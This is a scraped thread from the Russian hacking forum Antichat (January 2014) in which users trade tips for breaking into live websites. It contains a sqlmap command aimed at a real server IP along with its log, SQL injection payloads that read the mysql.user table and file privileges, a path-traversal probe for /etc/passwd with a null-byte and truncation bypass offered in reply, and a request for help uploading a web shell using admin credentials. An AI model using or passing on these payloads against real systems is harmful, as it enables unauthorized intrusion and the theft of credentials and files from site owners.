ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.01.2014, 18:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
107835
Репутация:
23
|
|
Сообщение от kingbeef
kingbeef said:
Фильтруется table_name . Что сделать можно?
подзапросы используй
chapters,flags,lands,menu,menu_out,roots,screens,s ites,stat,val,words
|
|
|
|
06.01.2014, 18:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
210
Репутация:
0
|
|
Просканировал с помощью sqlmap один игровой сервер
sqlmap --url="http://95.163.86.72/cgi-bin/webstrk.exe/strike?t=1" --data="position=0&tmpid=01234567890234567890"
в логе написало:
......
[16:45:33] [INFO] POST parameter 'position' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[16:45:44] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft Access'
.....
[16:51:10] [WARNING] POST parameter 'position' is not injectable
[16:51:10] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')
.....
Тестировал несколько раз.
Просмотрев лог запросов увидел что срабатывало на
position=-6458' OR (3053=8541)
position=0%22%29%20AND%206045%3D4434%20AND%20%28%2 2sLat%22%3D%22sLat
position=0%20AND%205338%3D7364
Вручную перебирал - ничего толкового не выходило (ошибки так таковой нету).
Вопрос - Есть ли вообще инъекция и какая база данных? (Microsoft Access или нет?)
|
|
|
|
06.01.2014, 18:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
+UnIon+selECt+group_concat(user,0x3a,file_priv),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+mysql.user
не выводит: Y, N
В чем ошибка? Как узнать права?!
|
|
|
|
06.01.2014, 21:54
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Always
Always said:
+UnIon+selECt+group_concat(user,0x3a,file_priv),2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+ from+mysql.user
не выводит: Y, N
В чем ошибка? Как узнать права?!
Если даже нет прав на mysql.user, то и File_priv подавно не будет.
|
|
|
06.01.2014, 22:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
17560
Репутация:
0
|
|
Сообщение от попугай
попугай said:
Если даже нет прав на mysql.user, то и File_priv подавно не будет.
есть!
|
|
|
|
07.01.2014, 14:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
388
Репутация:
0
|
|
бандиты подскажите плз
короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (
короче беда, подскажите че придумать можно?
|
|
|
|
07.01.2014, 15:31
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от x.Com
x.Com said:
бандиты подскажите плз
короче не могу залить шелл, пас и логин от админки есть, но админку найти не могу (
короче беда, подскажите че придумать можно?
ищи админку
|
|
|
|
08.01.2014, 04:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
182660
Репутация:
324
|
|
как крутить подобное ?
Код:
Code:
Failed to load: index/page_../../../../../../../../../etc/passwd.txt
|
|
|
|
08.01.2014, 13:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
15642
Репутация:
6
|
|
Сообщение от psihoz26
psihoz26 said:
как крутить подобное ?
Код:
Code:
Failed to load: index/page_../../../../../../../../../etc/passwd.txt
/etc/passwd%00 или /etc/passwd[////4096////]
|
|
|
|
08.01.2014, 19:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
388
Репутация:
0
|
|
Сообщение от Konqi
Konqi said:
ищи админку
дык найти не могу, второй день сижу уже, все перепробывал
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
